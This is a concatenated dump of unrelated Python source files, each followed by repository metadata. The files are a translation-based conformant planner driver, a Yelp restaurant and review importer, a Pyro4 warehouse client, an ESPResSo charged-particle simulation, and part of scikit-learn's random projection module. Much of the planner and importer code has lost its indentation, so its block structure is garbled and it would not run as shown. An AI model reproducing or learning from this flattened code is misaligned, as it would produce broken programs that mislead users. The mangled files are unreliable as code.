if Loc == '':
Loc='.'
    print 'Assuming that all required files are in the current directory\n'
valid_translation=set(['satplan', 'satmemless', 'sat', 'mc', 'k0', 't0', 'only-t0', 'old-t0', 'k1', 'only-k1', 's0', 'fs0', 't0c', 't0n', 't0s', 'kp'])
strategy=[]
strategy_name=''
for step in sstrategy.split(';'):
pair = step.split(':')
if(len(pair) != 2):
        pr('Badly formed strategy. Run %s without arguments to obtain help' % planner)
sys.exit(1)
translation=pair[0].strip()
if(not translation in valid_translation):
pr('Invalid translation: %s. Run %s without arguments to obtain help' % (translation, planner))
sys.exit(1)
t=pair[1].strip()
if(t != 'inf' and not t.isdigit()):
        pr('badly formed time: %s. Run %s without arguments to obtain help' % (t, planner))
sys.exit(1)
if(strategy_name == ''):
strategy_name = translation+'-'+t
else:
strategy_name += '_'+translation+'-'+t
strategy.append((translation, t))
pr('%s: a translation-based conformant planner' % planner.upper())
pr('UPF - 2006')
pr('')
cmdline = 'calling: '
for i in range(0,len(sys.argv)):
cmdline += sys.argv[i] + ' '
pr(gen_log(cmdline,date=True))
pr('Log file %s' % log_nf)
pr('Strategy -> '+sstrategy)
stat_nf=out+'.stat'
weak_unlink(stat_nf)
stat_f=open(stat_nf,'w')
print >> stat_f, 'Problem file:',problem_nf
print >> stat_f, 'Domain file:',domain_nf
try:
pwd=os.environ['PWD']
print >> stat_f, 'Working directory:',pwd
except:
pass
ipc5_nf=out+'.ipc5'
weak_unlink(ipc5_nf)
time_nf=out+'.time'
weak_unlink(time_nf)
tmpdir=os.environ['PWD']
# Pids of process started
pids=set()
# files to erase
erase=set()
# Set the signal handler and a alarm
signal.signal(signal.SIGINT, killall)
signal.signal(signal.SIGTERM, killall)
def call_translation(translation):
    # Straightforward SAT planning, good for generating many optimal plans for learning purposes
if(translation=='satplan'):
mysatplan(num_solutions)
# Not done yet
elif(translation=='satmemless'):
sat_memory_less()
# Complete translations using Prop Logic
elif(translation=='sat'):
cf2logic('cf2sat',dump_qbf)
elif(translation=='mc'):
cf2logic('cf2mc')
# Complete translations to Classical Planning
elif(translation=='k0'):
cf2cs('cf2cs','-k0')
elif(translation=='t0'):
cf2cs('cf2cs','-ak1 -static_disj -actcomp -and -s0 -static_disj -actcomp')
elif(translation=='only-t0'):
cf2cs('cf2cs','-ak1 -static_disj -actcomp')
elif(translation=='old-t0'):
cf2cs('cf2cs','-t0 -static_disj -actcomp -and -s0 -static_disj -actcomp')
elif(translation=='k1'):
cf2cs('cf2cs','-k1 -static_disj -actcomp -and -s0 -static_disj -actcomp')
elif(translation=='only-k1'):
cf2cs('cf2cs','-k1 -static_disj -actcomp')
elif(translation=='s0'):
cf2cs('cf2cs','-s0 -static_disj -actcomp')
elif(translation=='fs0'):
cf2cs('cf2cs','-fs0')
# For verifying consistency
elif(translation=='t0c'):
cf2cs('cf2cs','-pconsistent -ak1 -static_disj -actcomp -and -s0 -static_disj -actcomp')
# Options for cf2cs old version (in C++)
elif(translation=='t0n'):
cf2cs('cf2cs','-k0 -and -ak1 -static_disj -actcomp -and -s0 -static_disj -actcomp')
elif(translation=='t0s'):
cf2cs('cf2cs','-t0 -and -s0')
elif(translation=='kp'):
cf2cs('cf2cs','-kp -mac')
else:
        pr('bad translation in strategy: %s' % translation)
sys.exit(1)
def do_timeout(translation):
global statline
pr('-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-')
pr('Time out for %s.' % translation)
clean_children()
stat_f.write(statline+'\nTIMEOUT\n---------------\n')
statline=''
pr('-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-')
lost_used = 0
try:
for translation, t in strategy:
if(plan_found): break
if(t == 'inf'):
if(time_limit <= 0):
rtime='inf'
else:
rtime = time_limit - global_time()
elif(t.isdigit()):
if(time_limit <= 0):
rtime = int(t)
else:
rtime = min(int(t), time_limit - global_time())
else:
            pr('ill-formed time in strategy: %s' % t)
sys.exit(1)
if(rtime <= 0):
do_timeout(translation)
break
stat_f.write('Translation:'+translation+'\n')
pr('Calling translation %s during %s' % (translation,rtime))
if(rtime == 'inf'):
call_translation(translation)
else:
t = int(rtime)
lost = lost_wall_clock()
t += lost-lost_used
lost_used = lost
            pr('Recovering %s seconds lost' % lost_used)
try:
timeout.TimedOutFn(call_translation, int(t), translation)
except timeout.TimedOutExc:
do_timeout(translation)
except IOError, e:
pr('-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-')
pr('Ending abruptly. Last operation failed. See log file '+log_nf)
clean_children()
final_time=global_time()
if(plan_found and check_plan):
cmd=[Loc+'/verify','-plan',ipc5_nf,domain_nf,problem_nf]
pr(gen_log('--------- Calling',cmd))
verify=subprocess.Popen(cmd, bufsize=-1, stdout=subprocess.PIPE, stderr=log_f )
tokill.append(verify.pid)
isvalid = False
for l in verify.stdout.readlines():
pr(l)
if(l.startswith('valid plan')):
isvalid=True
statline += '\nVALID:'
if(isvalid):
statline += 'YES'
else:
statline += 'NO'
res = verify.wait()
tokill.pop()
if(res < 0):
pr('Error calling verify: %d' % res)
statline += '\n'
finish()
sys.exit(0)
|
PlanTool/plantool
|
code/Uncertainty/T0/translator/translator/translator.py
|
Python
|
gpl-2.0
| 68,757
|
[
"VisIt"
] |
44c82bfafc77ede013a0c443dd65050fa05995ca5655579f0a3a7eb72fcc9bcf
|
"""Helper methods to import yelp data"""
import json
from pprint import pprint
import numpy as np
import re
import cPickle as pickle
import os.path
VEGAS_RESTAURANTS_PATH = "pickles/get_restaurants_vegas.p"
PHOENIX_RESTAURANTS_PATH = "pickles/get_restaurants_phoenix.p"
EDINBURGH_RESTAURANTS_PATH = "pickles/get_restaurants_edinburgh.p"
WATERLOO_RESTAURANTS_PATH = "pickles/get_restaurants_waterloo.p"
MADISON_RESTAURANTS_PATH = "pickles/get_restaurants_madison.p"
VEGAS_REVIEWS_PATH = "pickles/get_reviews_vegas.p"
PHOENIX_REVIEWS_PATH = "pickles/get_reviews_phoenix.p"
EDINBURGH_REVIEWS_PATH = "pickles/get_reviews_edinburgh.p"
WATERLOO_REVIEWS_PATH = "pickles/get_reviews_waterloo.p"
MADISON_REVIEWS_PATH = "pickles/get_reviews_madison.p"
def get_pheonix_restaurants():
"""
    Get all Phoenix restaurants.
    Returns:
        All Phoenix restaurants as a list of restaurant dictionary objects.
"""
return get_restaurants("Phoenix", PHOENIX_RESTAURANTS_PATH)
def get_vegas_restaurants():
"""
    Get all Vegas restaurants.
    Returns:
        All Vegas restaurants as a list of restaurant dictionary objects.
"""
return get_restaurants("Las Vegas", VEGAS_RESTAURANTS_PATH)
def get_edinburgh_restaurants():
"""
    Get all Edinburgh restaurants.
    Returns:
        All Edinburgh restaurants as a list of restaurant dictionary objects.
"""
return get_restaurants("Edinburgh", EDINBURGH_RESTAURANTS_PATH)
def get_waterloo_restaurants():
"""
    Get all Waterloo restaurants.
    Returns:
        All Waterloo restaurants as a list of restaurant dictionary objects.
"""
return get_restaurants("Waterloo", WATERLOO_RESTAURANTS_PATH)
def get_madison_restaurants():
"""
    Get all Madison restaurants.
    Returns:
        All Madison restaurants as a list of restaurant dictionary objects.
"""
return get_restaurants("Madison", MADISON_RESTAURANTS_PATH)
def category_bag_of_words(restaurants):
"""
Get bag of words representation of restaurant's categories.
Parameters:
restaurants - a list of restaurant dictionary objects
Returns:
A bag of words dictionary, key-value pairings are category->category count.
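    Example:
        category_bag_of_words([{"categories": ["Pizza"]},
                               {"categories": ["Pizza", "Bars"]}])
        returns {"Pizza": 2, "Bars": 1}.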
"""
bag = {}
for restaurant in restaurants:
categories = restaurant["categories"]
for c in categories:
bag[c] = bag.get(c,0)+1
return bag
def get_restaurants(city_string, pickle_path=None):
"""
Get all restaurants in a city.
Parameters:
city_string - the city
pickle_path - optional path for storing and retrieving method results from pickle
Returns:
All restaurants in the specified city as a
list of restaurant dictionary objects.
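    Example:
        vegas = get_restaurants("Las Vegas", VEGAS_RESTAURANTS_PATH)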
"""
if pickle_path and os.path.exists(pickle_path):
print "Loading pickle..."
return pickle.load( open(pickle_path, "rb" ))
f = open('yelp_dataset/yelp_academic_dataset_business.json', "r")
print "Reading Restaurant JSON..."
lines = [line for line in f]
f.close()
businesses = [json.loads(line) for line in lines]
restaurants = [business for business in businesses\
if business["city"] == city_string\
and "Restaurants" in business["categories"]]
restaurants = np.array(restaurants)
if pickle_path:
pickle.dump( restaurants, open( pickle_path, "wb" ))
return restaurants
def get_vegas_reviews():
"""
Get all Vegas reviews.
Returns:
        A dict mapping each Vegas restaurant's business_id to its concatenated review text.
"""
return get_reviews_from_restuaraunts("Las Vegas", VEGAS_REVIEWS_PATH)
def get_phoenix_reviews():
"""
Get all Phoenix reviews.
Returns:
        A dict mapping each Phoenix restaurant's business_id to its concatenated review text.
"""
return get_reviews_from_restuaraunts("Phoenix", PHOENIX_REVIEWS_PATH)
def get_edinburgh_reviews():
"""
Get all Edinburgh reviews.
Returns:
        A dict mapping each Edinburgh restaurant's business_id to its concatenated review text.
"""
return get_reviews_from_restuaraunts("Edinburgh", EDINBURGH_REVIEWS_PATH)
def get_waterloo_reviews():
"""
Get all Waterloo reviews.
Returns:
        A dict mapping each Waterloo restaurant's business_id to its concatenated review text.
"""
return get_reviews_from_restuaraunts("Waterloo", WATERLOO_REVIEWS_PATH)
def get_madison_reviews():
"""
Get all Madison reviews.
Returns:
        A dict mapping each Madison restaurant's business_id to its concatenated review text.
"""
return get_reviews_from_restuaraunts("Madison", MADISON_REVIEWS_PATH)
def get_reviews_from_restuaraunts(city_string, pickle_path):
"""
Get all reviews for a city.
Parameters:
city_string - the city
pickle_path - optional path for storing and retrieving method results from pickle
Returns:
        A dict mapping each restaurant's business_id to the concatenation of its review texts.
"""
total_reviews = 0
if pickle_path and os.path.exists(pickle_path):
print "Loading pickle"
return pickle.load( open(pickle_path, "rb" ))
restaurants = get_restaurants(city_string, None)
relevant_restaurant_ids = {restaurant["business_id"] for restaurant in restaurants}
f = open('yelp_dataset/yelp_academic_dataset_review.json', "r")
print "Reading Review JSON..."
lines = [line for line in f]
f.close()
print "Done Reading Review JSON..."
print "Parsing Review JSON..."
reviews = [json.loads(line) for line in lines]
print "Done Parsing Review JSON..."
    restauraunt_id_to_review_text = {}
    for review in reviews:
        business_id = review["business_id"]
        if business_id in relevant_restaurant_ids:
            # append this review's text to the restaurant's running string
            val = restauraunt_id_to_review_text.get(business_id, "")
            restauraunt_id_to_review_text[business_id] = val + review["text"]
            total_reviews += 1
pickle.dump(restauraunt_id_to_review_text, open( pickle_path, "wb" ))
    print "Total reviews:", total_reviews
return restauraunt_id_to_review_text
def get_words_from_text(text, stop_words = {}):
"""
Get a list of words from a given text.
Parameters:
text - the text to be parsed into words
stop_words - optional set of words to be ignored in the text
Returns:
A list of words from the text, in order, consisting of only
non-numeric alphanumeric characters and not containing any
words in the stop_words set.
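    Example:
        get_words_from_text("Great food, great price!", {"great"})
        returns ['Great', 'food', 'price'] (stop-word matching is case-sensitive).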
"""
cleaned_text = re.sub('\\n', ' ', text)
cleaned_text = re.split('[\s,.()!&?/\*\^#@0-9":=\[\]$\\;%]|--', cleaned_text)
cleaned_text = [x for x in cleaned_text if x!='' and x not in stop_words]
return cleaned_text
def get_topic_labels():
"""
Get all topic labels.
Returns:
A list of all 50 topic labels as strings.
"""
labels = [\
"Buffet/Upscale",
"Steak & Eggs",
"Tacos",
"Mexican",
"Pho",
"Seafood/Buffet",
"Sports Bar",
"Nightlife",
"Brunch",
"Ramen",
"Chinese",
"Seafood",
"Dim Sum",
"Vegan/Healthy",
"Tapas",
"Upscale",
"Buffet",
"Indian",
"Burgers",
"Greek",
"Fish & Chips",
"Street Vendors",
"Korean BBQ",
"Mexican/Bar",
"Italian",
"Pizza",
"BBQ",
"Burgers",
"Thai",
"Waffles/Brunch",
"Bad Service",
"Luxe",
"Dessert",
"Sushi",
"Deli",
"Asian/Authentic",
"Burritos",
"Steakhouse",
"Exotic American",
"Wine/Upscale",
"Cafe",
"Upscale",
"Sushi",
"Soup",
"Oysters",
"Casino/Hotel",
"Noodles",
"Chinese",
"Buffet",
"Prime Rib",
]
return labels
|
harinisuresh/yelp-district-clustering
|
DataImporter.py
|
Python
|
mit
| 7,566
|
[
"CASINO"
] |
dd3b136f0e9b89d8d7cdc5cf60293b8735fe17ee41ae8ae090cb86fb3607ad25
|
# This is the code that visits the warehouse.
import sys
import Pyro4
import Pyro4.util
from person import Person
sys.excepthook = Pyro4.util.excepthook
warehouse = Pyro4.Proxy("PYRONAME:example.warehouse")
janet = Person("Janet")
henry = Person("Henry")
janet.visit(warehouse)
henry.visit(warehouse)
|
irmen/Pyro4
|
examples/warehouse/phase3/visit.py
|
Python
|
mit
| 305
|
[
"VisIt"
] |
bfd836dfc2a5c495d07b2c4f168d5a7609bfec99f11a73e4a6b588ae5ac73f01
|
# Copyright (C) 2010-2019 The ESPResSo project
#
# This file is part of ESPResSo.
#
# ESPResSo is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
Visualize a simulation with a pool of particles with various charges,
LJ parameters and masses.
"""
import espressomd
from espressomd.minimize_energy import steepest_descent
from espressomd.visualization_opengl import openGLLive
from espressomd import electrostatics
import numpy as np
required_features = ["P3M", "LENNARD_JONES", "MASS"]
espressomd.assert_features(required_features)
box = [40, 40, 40]
system = espressomd.System(box_l=box)
system.cell_system.set_domain_decomposition(use_verlet_lists=True)
visualizer = openGLLive(system, background_color=[1, 1, 1],
drag_enabled=True, drag_force=10)
# TIMESTEP
time_step_fs = 1.0
system.time_step = time_step_fs * 1.0e-2
system.cell_system.skin = 1.2
# TEMPERATURE
SI_temperature = 400.0
kb_kjmol = 0.0083145
temperature = SI_temperature * kb_kjmol
# COULOMB PREFACTOR (elementary charge)^2 / (4*pi*epsilon) in Angstrom*kJ/mol
epsilon_r = 4.0 # dimensionless
epsilon_0 = 8.8541878128e-12 # units of [C^2/J/m]
q_e = 1.602176634e-19 # units of [C]
avogadro = 6.022e23  # units of [1/mol]
prefactor = q_e**2 / (4 * np.pi * epsilon_r * epsilon_0) # units of [J.m]
# convert energies to kJ/mol, with distances in Angstroms
coulomb_prefactor = prefactor * avogadro / 1000 * 1e10
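# Sanity check of the conversion (derivable from the constants above):
# q_e^2/(4*pi*eps_r*eps_0) is in J*m; multiplying by N_A/1000 gives kJ/mol
# per metre, and the final 1e10 converts metres to Angstroms, so
# coulomb_prefactor ~= 1389/epsilon_r ~= 347 kJ*A/mol here.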
# FORCE FIELDS
# distances in Angstroms, epsilons in kBT, masses in g/mol
species = ["Cl", "Na", "Colloid", "Solvent"]
types = {"Cl": 0, "Na": 1, "Colloid": 2, "Solvent": 3}
charges = {"Cl": -1.0, "Na": 1.0, "Colloid": -3.0, "Solvent": 0.0}
lj_sigmas = {"Cl": 3.85, "Na": 2.52, "Colloid": 10.0, "Solvent": 1.5}
lj_epsilons = {"Cl": 192.45, "Na": 17.44,
"Colloid": 100.0, "Solvent": 50.0}
lj_cuts = {"Cl": 2.0 * lj_sigmas["Cl"], "Na": 2.0 * lj_sigmas["Na"],
"Colloid": 1.5 * lj_sigmas["Colloid"],
"Solvent": 2.0 * lj_sigmas["Solvent"]}
masses = {"Cl": 35.453, "Na": 22.99, "Colloid": 300, "Solvent": 18.0}
n_ionpairs = 50
for i in range(n_ionpairs):
for t in ["Na", "Cl"]:
system.part.add(pos=box * np.random.random(3),
q=charges[t], type=types[t], mass=masses[t])
n_colloids = 30
t = "Colloid"
t_co = "Na"
for i in range(n_colloids):
system.part.add(pos=box * np.random.random(3),
q=charges[t], type=types[t], mass=masses[t])
for i in range(int(abs(charges[t]))):
system.part.add(pos=box * np.random.random(3),
q=charges[t_co], type=types[t_co], mass=masses[t_co])
n_solvents = 800
t = "Solvent"
for i in range(n_solvents):
system.part.add(pos=box * np.random.random(3),
q=charges[t], type=types[t], mass=masses[t])
def combination_rule_epsilon(rule, eps1, eps2):
    # Berthelot rule: geometric mean of the epsilons
    if rule == "Berthelot":
        return (eps1 * eps2)**0.5
    else:
        raise ValueError("No combination rule defined")
def combination_rule_sigma(rule, sig1, sig2):
    # Lorentz rule: arithmetic mean of the sigmas
    if rule == "Lorentz":
        return (sig1 + sig2) * 0.5
    else:
        raise ValueError("No combination rule defined")
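# Worked example (editor's note): for the Na-Cl pair the Lorentz-Berthelot
# rules above give
#   sigma_NaCl   = (2.52 + 3.85) / 2     = 3.185 Angstrom
#   epsilon_NaCl = sqrt(17.44 * 192.45) ~= 57.9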
# Lennard-Jones interactions parameters
for i in range(len(species)):
for j in range(i, len(species)):
s = [species[i], species[j]]
        lj_sig = combination_rule_sigma(
            "Lorentz", lj_sigmas[s[0]], lj_sigmas[s[1]])
        lj_cut = combination_rule_sigma(
            "Lorentz", lj_cuts[s[0]], lj_cuts[s[1]])
        lj_eps = combination_rule_epsilon(
            "Berthelot", lj_epsilons[s[0]], lj_epsilons[s[1]])
system.non_bonded_inter[types[s[0]], types[s[1]]].lennard_jones.set_params(
epsilon=lj_eps, sigma=lj_sig, cutoff=lj_cut, shift="auto")
energy = system.analysis.energy()
print("Before Minimization: E_total = {:.2e}".format(energy['total']))
steepest_descent(system, f_max=1000, gamma=30.0, max_steps=1000,
max_displacement=0.01)
energy = system.analysis.energy()
print("After Minimization: E_total = {:.2e}".format(energy['total']))
print("Tune p3m")
p3m = electrostatics.P3M(prefactor=coulomb_prefactor, accuracy=1e-1)
system.actors.add(p3m)
system.thermostat.set_langevin(kT=temperature, gamma=2.0, seed=42)
visualizer.run(1)
|
KaiSzuttor/espresso
|
samples/visualization_charged.py
|
Python
|
gpl-3.0
| 4,820
|
[
"Avogadro",
"ESPResSo"
] |
e2b73afb93dfba7d50c9424e54f0fe76093c5a5fae6f7c5ce76c935f01b6bea4
|
# -*- coding: utf8
"""Random Projection transformers
Random Projections are a simple and computationally efficient way to
reduce the dimensionality of the data by trading a controlled amount
of accuracy (as additional variance) for faster processing times and
smaller model sizes.
The dimensions and distribution of Random Projections matrices are
controlled so as to preserve the pairwise distances between any two
samples of the dataset.
The main theoretical result behind the efficiency of random projection is the
`Johnson-Lindenstrauss lemma (quoting Wikipedia)
<https://en.wikipedia.org/wiki/Johnson%E2%80%93Lindenstrauss_lemma>`_:
In mathematics, the Johnson-Lindenstrauss lemma is a result
concerning low-distortion embeddings of points from high-dimensional
into low-dimensional Euclidean space. The lemma states that a small set
of points in a high-dimensional space can be embedded into a space of
much lower dimension in such a way that distances between the points are
nearly preserved. The map used for the embedding is at least Lipschitz,
and can even be taken to be an orthogonal projection.
"""
# Authors: Olivier Grisel <olivier.grisel@ensta.org>,
# Arnaud Joly <a.joly@ulg.ac.be>
# License: BSD 3 clause
from __future__ import division
import warnings
from abc import ABCMeta, abstractmethod
import numpy as np
from numpy.testing import assert_equal
import scipy.sparse as sp
from .base import BaseEstimator, TransformerMixin
from .externals import six
from .externals.six.moves import xrange
from .utils import check_random_state
from .utils.extmath import safe_sparse_dot
from .utils.random import sample_without_replacement
from .utils.validation import check_array, check_is_fitted
from .exceptions import DataDimensionalityWarning
__all__ = ["SparseRandomProjection",
"GaussianRandomProjection",
"johnson_lindenstrauss_min_dim"]
def johnson_lindenstrauss_min_dim(n_samples, eps=0.1):
"""Find a 'safe' number of components to randomly project to
The distortion introduced by a random projection `p` only changes the
    distance between two points by a factor (1 ± eps) in a Euclidean space
with good probability. The projection `p` is an eps-embedding as defined
by:
(1 - eps) ||u - v||^2 < ||p(u) - p(v)||^2 < (1 + eps) ||u - v||^2
Where u and v are any rows taken from a dataset of shape [n_samples,
n_features], eps is in ]0, 1[ and p is a projection by a random Gaussian
N(0, 1) matrix with shape [n_components, n_features] (or a sparse
Achlioptas matrix).
The minimum number of components to guarantee the eps-embedding is
given by:
n_components >= 4 log(n_samples) / (eps^2 / 2 - eps^3 / 3)
Note that the number of dimensions is independent of the original
number of features but instead depends on the size of the dataset:
the larger the dataset, the higher is the minimal dimensionality of
an eps-embedding.
Read more in the :ref:`User Guide <johnson_lindenstrauss>`.
Parameters
----------
n_samples : int or numpy array of int greater than 0,
Number of samples. If an array is given, it will compute
a safe number of components array-wise.
eps : float or numpy array of float in ]0,1[, optional (default=0.1)
Maximum distortion rate as defined by the Johnson-Lindenstrauss lemma.
If an array is given, it will compute a safe number of components
array-wise.
Returns
-------
n_components : int or numpy array of int,
The minimal number of components to guarantee with good probability
an eps-embedding with n_samples.
Examples
--------
>>> johnson_lindenstrauss_min_dim(1e6, eps=0.5)
663
>>> johnson_lindenstrauss_min_dim(1e6, eps=[0.5, 0.1, 0.01])
array([ 663, 11841, 1112658])
>>> johnson_lindenstrauss_min_dim([1e4, 1e5, 1e6], eps=0.1)
array([ 7894, 9868, 11841])
References
----------
.. [1] https://en.wikipedia.org/wiki/Johnson%E2%80%93Lindenstrauss_lemma
.. [2] Sanjoy Dasgupta and Anupam Gupta, 1999,
"An elementary proof of the Johnson-Lindenstrauss Lemma."
http://citeseer.ist.psu.edu/viewdoc/summary?doi=10.1.1.45.3654
"""
eps = np.asarray(eps)
n_samples = np.asarray(n_samples)
if np.any(eps <= 0.0) or np.any(eps >= 1):
raise ValueError(
"The JL bound is defined for eps in ]0, 1[, got %r" % eps)
    if np.any(n_samples <= 0):
raise ValueError(
"The JL bound is defined for n_samples greater than zero, got %r"
% n_samples)
denominator = (eps ** 2 / 2) - (eps ** 3 / 3)
return (4 * np.log(n_samples) / denominator).astype(np.int)
def _check_density(density, n_features):
"""Factorize density check according to Li et al."""
if density == 'auto':
density = 1 / np.sqrt(n_features)
elif density <= 0 or density > 1:
raise ValueError("Expected density in range ]0, 1], got: %r"
% density)
return density
def _check_input_size(n_components, n_features):
"""Factorize argument checking for random matrix generation"""
if n_components <= 0:
raise ValueError("n_components must be strictly positive, got %d" %
n_components)
if n_features <= 0:
raise ValueError("n_features must be strictly positive, got %d" %
                         n_features)
def gaussian_random_matrix(n_components, n_features, random_state=None):
"""Generate a dense Gaussian random matrix.
The components of the random matrix are drawn from
N(0, 1.0 / n_components).
Read more in the :ref:`User Guide <gaussian_random_matrix>`.
Parameters
----------
n_components : int,
Dimensionality of the target projection space.
n_features : int,
Dimensionality of the original source space.
random_state : int, RandomState instance or None, optional (default=None)
Control the pseudo random number generator used to generate the matrix
at fit time. If int, random_state is the seed used by the random
number generator; If RandomState instance, random_state is the random
number generator; If None, the random number generator is the
RandomState instance used by `np.random`.
Returns
-------
components : numpy array of shape [n_components, n_features]
The generated Gaussian random matrix.
See Also
--------
GaussianRandomProjection
sparse_random_matrix
"""
_check_input_size(n_components, n_features)
rng = check_random_state(random_state)
components = rng.normal(loc=0.0,
scale=1.0 / np.sqrt(n_components),
size=(n_components, n_features))
return components
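# Editor's note: with entries drawn from N(0, 1 / n_components), the expected
# squared norm of a projected vector u equals ||u||^2, since
# E[||M u||^2] = n_components * (1 / n_components) * ||u||^2.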
def sparse_random_matrix(n_components, n_features, density='auto',
random_state=None):
"""Generalized Achlioptas random sparse matrix for random projection
Setting density to 1 / 3 will yield the original matrix by Dimitris
Achlioptas while setting a lower value will yield the generalization
by Ping Li et al.
If we note :math:`s = 1 / density`, the components of the random matrix are
drawn from:
- -sqrt(s) / sqrt(n_components) with probability 1 / 2s
- 0 with probability 1 - 1 / s
- +sqrt(s) / sqrt(n_components) with probability 1 / 2s
Read more in the :ref:`User Guide <sparse_random_matrix>`.
Parameters
----------
n_components : int,
Dimensionality of the target projection space.
n_features : int,
Dimensionality of the original source space.
density : float in range ]0, 1] or 'auto', optional (default='auto')
Ratio of non-zero component in the random projection matrix.
If density = 'auto', the value is set to the minimum density
as recommended by Ping Li et al.: 1 / sqrt(n_features).
Use density = 1 / 3.0 if you want to reproduce the results from
Achlioptas, 2001.
random_state : int, RandomState instance or None, optional (default=None)
Control the pseudo random number generator used to generate the matrix
at fit time. If int, random_state is the seed used by the random
number generator; If RandomState instance, random_state is the random
number generator; If None, the random number generator is the
RandomState instance used by `np.random`.
Returns
-------
components : array or CSR matrix with shape [n_components, n_features]
        The generated sparse random matrix.
See Also
--------
SparseRandomProjection
gaussian_random_matrix
References
----------
.. [1] Ping Li, T. Hastie and K. W. Church, 2006,
"Very Sparse Random Projections".
http://web.stanford.edu/~hastie/Papers/Ping/KDD06_rp.pdf
.. [2] D. Achlioptas, 2001, "Database-friendly random projections",
http://www.cs.ucsc.edu/~optas/papers/jl.pdf
"""
_check_input_size(n_components, n_features)
density = _check_density(density, n_features)
rng = check_random_state(random_state)
if density == 1:
# skip index generation if totally dense
components = rng.binomial(1, 0.5, (n_components, n_features)) * 2 - 1
return 1 / np.sqrt(n_components) * components
else:
# Generate location of non zero elements
indices = []
offset = 0
indptr = [offset]
for i in xrange(n_components):
# find the indices of the non-zero components for row i
n_nonzero_i = rng.binomial(n_features, density)
indices_i = sample_without_replacement(n_features, n_nonzero_i,
random_state=rng)
indices.append(indices_i)
offset += n_nonzero_i
indptr.append(offset)
indices = np.concatenate(indices)
# Among non zero components the probability of the sign is 50%/50%
data = rng.binomial(1, 0.5, size=np.size(indices)) * 2 - 1
# build the CSR structure by concatenating the rows
components = sp.csr_matrix((data, indices, indptr),
shape=(n_components, n_features))
return np.sqrt(1 / density) / np.sqrt(n_components) * components
class BaseRandomProjection(six.with_metaclass(ABCMeta, BaseEstimator,
TransformerMixin)):
"""Base class for random projections.
Warning: This class should not be used directly.
Use derived classes instead.
"""
@abstractmethod
def __init__(self, n_components='auto', eps=0.1, dense_output=False,
random_state=None):
self.n_components = n_components
self.eps = eps
self.dense_output = dense_output
self.random_state = random_state
@abstractmethod
    def _make_random_matrix(self, n_components, n_features):
""" Generate the random projection matrix
Parameters
----------
n_components : int,
Dimensionality of the target projection space.
n_features : int,
Dimensionality of the original source space.
Returns
-------
components : numpy array or CSR matrix [n_components, n_features]
The generated random matrix.
"""
def fit(self, X, y=None):
"""Generate a sparse random projection matrix
Parameters
----------
X : numpy array or scipy.sparse of shape [n_samples, n_features]
Training set: only the shape is used to find optimal random
matrix dimensions based on the theory referenced in the
            aforementioned papers.
y : is not used: placeholder to allow for usage in a Pipeline.
Returns
-------
self
"""
X = check_array(X, accept_sparse=['csr', 'csc'])
n_samples, n_features = X.shape
if self.n_components == 'auto':
self.n_components_ = johnson_lindenstrauss_min_dim(
n_samples=n_samples, eps=self.eps)
if self.n_components_ <= 0:
raise ValueError(
'eps=%f and n_samples=%d lead to a target dimension of '
'%d which is invalid' % (
self.eps, n_samples, self.n_components_))
elif self.n_components_ > n_features:
raise ValueError(
'eps=%f and n_samples=%d lead to a target dimension of '
'%d which is larger than the original space with '
'n_features=%d' % (self.eps, n_samples, self.n_components_,
n_features))
else:
if self.n_components <= 0:
raise ValueError("n_components must be greater than 0, got %s"
% self.n_components)
elif self.n_components > n_features:
warnings.warn(
"The number of components is higher than the number of"
" features: n_features < n_components (%s < %s)."
"The dimensionality of the problem will not be reduced."
% (n_features, self.n_components),
DataDimensionalityWarning)
self.n_components_ = self.n_components
# Generate a projection matrix of size [n_components, n_features]
self.components_ = self._make_random_matrix(self.n_components_,
n_features)
# Check contract
assert_equal(
self.components_.shape,
(self.n_components_, n_features),
            err_msg=('An error has occurred: the self.components_ matrix '
                     'does not have the proper shape.'))
return self
def transform(self, X, y=None):
"""Project the data by using matrix product with the random matrix
Parameters
----------
X : numpy array or scipy.sparse of shape [n_samples, n_features]
The input data to project into a smaller dimensional space.
y : is not used: placeholder to allow for usage in a Pipeline.
Returns
-------
X_new : numpy array or scipy sparse of shape [n_samples, n_components]
Projected array.
"""
X = check_array(X, accept_sparse=['csr', 'csc'])
check_is_fitted(self, 'components_')
if X.shape[1] != self.components_.shape[1]:
raise ValueError(
                'Impossible to perform projection: '
'X at fit stage had a different number of features. '
'(%s != %s)' % (X.shape[1], self.components_.shape[1]))
X_new = safe_sparse_dot(X, self.components_.T,
dense_output=self.dense_output)
return X_new
class GaussianRandomProjection(BaseRandomProjection):
"""Reduce dimensionality through Gaussian random projection
The components of the random matrix are drawn from N(0, 1 / n_components).
Read more in the :ref:`User Guide <gaussian_random_matrix>`.
Parameters
----------
n_components : int or 'auto', optional (default = 'auto')
Dimensionality of the target projection space.
n_components can be automatically adjusted according to the
number of samples in the dataset and the bound given by the
Johnson-Lindenstrauss lemma. In that case the quality of the
embedding is controlled by the ``eps`` parameter.
        It should be noted that the Johnson-Lindenstrauss lemma can yield
        very conservative estimates of the required number of components
        as it makes no assumptions on the structure of the dataset.
eps : strictly positive float, optional (default=0.1)
Parameter to control the quality of the embedding according to
the Johnson-Lindenstrauss lemma when n_components is set to
'auto'.
Smaller values lead to better embedding and higher number of
dimensions (n_components) in the target projection space.
random_state : int, RandomState instance or None, optional (default=None)
Control the pseudo random number generator used to generate the matrix
at fit time. If int, random_state is the seed used by the random
number generator; If RandomState instance, random_state is the random
number generator; If None, the random number generator is the
RandomState instance used by `np.random`.
Attributes
----------
    n_components_ : int
Concrete number of components computed when n_components="auto".
components_ : numpy array of shape [n_components, n_features]
Random matrix used for the projection.
See Also
--------
SparseRandomProjection
"""
def __init__(self, n_components='auto', eps=0.1, random_state=None):
super(GaussianRandomProjection, self).__init__(
n_components=n_components,
eps=eps,
dense_output=True,
random_state=random_state)
def _make_random_matrix(self, n_components, n_features):
""" Generate the random projection matrix
Parameters
----------
n_components : int,
Dimensionality of the target projection space.
n_features : int,
Dimensionality of the original source space.
Returns
-------
